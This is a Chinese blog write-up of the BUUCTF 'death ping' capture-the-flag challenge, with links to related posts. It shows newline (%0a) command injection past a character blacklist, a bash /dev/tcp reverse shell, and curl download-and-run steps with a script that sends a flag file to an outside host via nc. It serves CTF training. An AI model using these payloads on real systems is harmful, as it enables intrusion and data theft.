BUUCTF--[第二章 web进阶]死亡ping命令

最新推荐文章于 2024-11-13 22:36:43 发布
最新推荐文章于 2024-11-13 22:36:43 发布
阅读量7.6k 收藏 12
点赞数 1
分类专栏: buuctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45414878/article/details/109672659
版权

BUUCTF–[第二章 web进阶]死亡ping命令

本文只是对官方wp进行了一点修改,因为在测试过程中发现8080端口弹不回flag,在本地测试也是一样的结果,但是把端口修改成8089,其他端口应该也可以,并且nc监听方式为:nc -lvp 8089,flag的值才能弹回。

开启环境发现是一个ping的页面,通过ping可以发现是存在一些黑名单过滤的,被拦截时候显示IP包含恶意字符。

利用fuzz的方式能够知道过滤了以下字符:

["$", "{", "}", "`", ";", "&", "|", "(", ")", "\"", "'", "~", "!", "@", "#", "%", "^", "*", "[", "]", "\\", ":", "-", "_"];

在这里插入图片描述
通过%0a能够注入新的一条命令进行执行。

ip=127.0.0.1%0als

在这里插入图片描述

由于docker是没有bash、python程序的,并且sh反弹是不行的。

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1

目前是能通过折中的方式执行任意命令,用小号在BUU上开一个内网的主机

编写1.sh,内容如下:

ls
cat /FLAG | nc your_buu_ip 8089

把他复制到网站根目录
在靶机上用curl下载

127.0.0.1%0acurl your_buu_ip/1.sh > /tmp/1.sh   #请求bash文件到tmp目录

在这里插入图片描述

127.0.0.1%0achmod 777 /tmp/1.sh #给bash加权限

在这里插入图片描述

nc -lvp 8089  #your_buu_ip的机器上进行监听8089端口

127.0.0.1%0ash /tmp/1.sh #执行bash文件

在这里插入图片描述

ps:

个人站点博客:XingHe,欢迎来踩~

XingHe_0
关注
专栏目录
[实验室每日一题][20201123][Web]死亡ping命令
m0_50317371的博客
12-02 3866
原题目:BUUCTF–[第二章 web进阶]死亡ping命令 前置基础(本题会用到的相关命令) liunx命令 ls命令 Linux ls(英文全拼:list files):命令用于显示指定工作目录下之内容(列出目前工作目录所含之文件及子目录)。 转自:菜鸟教程 cat命令 cat(英文全拼:concatenate):命令用于连接文件并打印到标准输出设备上。 转自:菜鸟教程 curl命令 curl(英文全拼:CommandLine Uniform Resource Locator):curl 是常用的命令
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
weixin_46703850的博客
02-26 3492
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
从0到1:CTFer成长之路——死亡 Ping 命令
weixin_51559599的博客
10-26 442
手动尝试慢脚本生成可打印字符,后面拼接命令bp 爆破出现中文乱码设置编码爆破最终发现转义后的%0A拼接时未被过滤。
BUUCTF---死亡Ping详解
qq_49422880的博客
05-25 3615
BUUCTF-GXYCTF2019 ping ping ping前言知识点总结关于通配符总结 前言  &esmp;昨晚半夜在一个大佬的博客里看到了个名叫BUUCTF的一个刷题的地方,心想大佬都在上面玩,我这波怎么不得在上面留下自己的痕迹,第二天就直接上手,也就遇到了ping 这题,这不简单直接连刷两题,因为之前也接触过关于ping的题,然而就在GXYCTF2019上的一篇WP上,刷新了我对绕过的认识,于是乎写下本博客记录所学知识点。 知识点总结 先上题目为敬: 疯狂暗示!!!首先我们这里先随便测
BUUCTF [第二章 web进阶]SSRF Training
weixin_43520214的博客
09-24 1227
SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种网络攻击,攻击者通过欺骗服务器,使其向本不该访问的内部或外部资源发出 HTTP 请求。这种攻击允许攻击者间接利用服务器发起请求,绕过防火墙、访问内网系统,甚至读取本地资源。SSRF 攻击的基本概念:在 SSRF 攻击中,攻击者并不直接访问目标资源,而是通过服务器充当代理来发起请求。
[CTF夺旗赛] BUUCTF N1BOOK 第二章 web进阶
Da1NtY的博客
08-23 1332
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。BUUCTF是一个很好的CTF训练平台,这里介绍的是N1BOOK部分的第二章,后续会陆续更新。
[第二章 web进阶]死亡ping命令
最新发布
shierbai的博客
11-13 336
127.0.0.1%0acurl B/1.sh > /tmp/1.sh #请求bash文件到tmp目录。1.先在B上面写一个1.sh文件里面是读取flag的命令,同时命令连接符去做目标主机端口监听。127.0.0.1%0achmod 777 /tmp/1.sh #给bash加权限。这里不想搞公网ip去做操作,看了一下别人用小号搞了一台内网主机。这里试了很多连接符,发现只有%0a可以绕过。这样会在B机器上面得到发过来的flag。2.然后通过命令注入让A执行。3.命令注入让A执行。
BUU N1BOOK [第二章 web进阶]死亡ping命令
SwBack的博客
09-02 2390
存在以下黑名单过滤 ["$", "{", "}", "`", ";", "&", "|", "(", ")", "\"","'", "~", "!", "@", "#", "%", "^", "*", "[", "]", "\\", ":", "-", "_"]; 但是发现%0a可以执行命令 准备工作 一台具备公网IP的服务器 我这里采用的是自己的服务器,没有服务器的可以注册个小号,在BUU平台开启如下环境 首先在公网服务器上面写入shell文件 内容如下 a=`cat /FLAG` c.
BUU N1BOOK题目死亡ping命令
weixin_48876267的博客
11-30 882
介绍:路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串 version: "3.2" services: converter: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-command:latest ports: - 80:80 本地搭建docker-compose 打开题目 输入127.0.0.1&&id,发现报错。存在恶意字符过滤 抓包进行fuzz扫描测试 fu.
死亡ping
10-23
默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt
nu1l-死亡ping命令攻略
qq_58683895的博客
10-26 567
本文展示了从0到1成长之路ctfer-nu1l的死亡ping命令如何获取flag,并且包含了靶机在不同网络环境下的处理方法
asp网站远程监控(超级管理)系统
02-23
软件介绍: 本系统采用无数据库记录数据以及XMLHTML无刷新的“双无”技术对您的网站实行超级管理。只要将程序代码放入ASP网站或空间,所有浏览你网站的访问者行踪均在你的监视之下。你可以根据实际情况在后台对访问者进行友好或不友好的实时远程控制。主要特点:1、本系统采用无数据库记录数据技术:特点是不与网站其它程序冲突,记录的数据无遗漏。2、XMLHTML无刷新技术:特点是访问者在瞬间会收到你发送的讯息或封锁、反攻击措施,而你的网站不会刷新。 主要作用:1、对访问者访问你网站的时间、从哪一页面而来、已经浏览了哪些页面、正在浏览哪个页面等具体情况一览无遗,了如指掌!2、如果你的网站有登录入口,无论是访问者登录成功或试图登录而未成功的,其填入的用户名和密码会在“用户”栏清晰地暴露在你面前。3、新添了最新IP地址数据库,你可以随时掌握访问者的IP地址和物理位置(精确到国家、省、市、县或更小的单位、网吧和其它区域)。4、你可以对指定的访问者发出友好提示,对方迅即就可收到你的提示信息。5、你可以随时掌握不怀好意的访问者的动态情况,甚至对攻击你网站的黑客进行反攻击(因采用无刷新技术,对方在瞬间就会就范),让你的网站远离黑客(对方从此无法访问你的网站)或让黑客电脑挂起、死机!(并非病毒)6、你对访问者采取的友好或不友好的措施,可以事先提示或警告对方,也可以不加任何提示或警告。这些措施还可以根据你的意愿随时解除。7、本系统适用于任意大中小型ASP网站和ASP空间(默认支持XMLHTTP),不与网站其它程序相冲突,占用资源少,各项设置一目了然,有详细说明。8、本系统记录的数据准确、全面、真实、无遗漏,可下载本地保存,其界面清晰友好,功能全面强大,兼具实用性娱乐性,版本不断完善升级(正式版升级免费)。版权声明:本程序由XuJia设计制作,版权归徐佳所有。免费版不提供无刷新技术,访问者只有刷新网站页面才收到讯息。不提供封锁和攻击功能。演示地址:http://xu.bigwww.com/feng默认用户名:admin 默认密码:admin联系QQ:174215095(不在时留言,必复)联系电话:13607259528(随时)邮箱:yh163cn@yahoo.com.cn(必复)
buuctf-ping
m0_62094846的博客
11-13 1182
要输入地址,第一反应127.0.0.1,试一试 应该是ping对了 网络查询ping:测试网络连接量的程序,可以确定本地主机能否与另一台主机成功连接,并确定参数等信息是否设置正确 ping命令用法: windowsping 在Windows系列的操作系统中,我们都可以使用ping命令来解决网络中出现的路由问题,方法如下 [5] : ①检查当前的IP配置。在Windows系统中使用ipconfig.exe检查IP配置。 ②在Windows系统中,ping命令允许在命令行中输入选...
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1582
SQL注入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5322
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
CTFping命令绕过及符号用法
热门推荐
诚邀网络通信领域商务合作
10-13 1万+
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
死亡ping命令
2301_79118231的博客
10-27 385
注:个人笔记,并不详细,仅供参考。
从0到1:CTFer的成长之路死亡ping命令
一个努力学习网安的小牛马
10-26 236
死亡ping命令
buuctf web Ping Ping Ping
08-04
根据引用[1]和引用[2]的内容,题目"buuctf web Ping Ping Ping"涉及到多命令执行和绕过空格的问题。根引用[2]中的思路分析,可以使用反引号来绕过空格过滤,并执行ls命令来查询文件名。构造的payload如下:?ip=1;cat$IFS$9`ls`。这样可以获取到flag.php和index.php这两个文件名。然而,关于如何绕过flag的过滤,引用[1]中并没有提到具体的方法。因此,需要进一步的信息才能回答这个问题。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值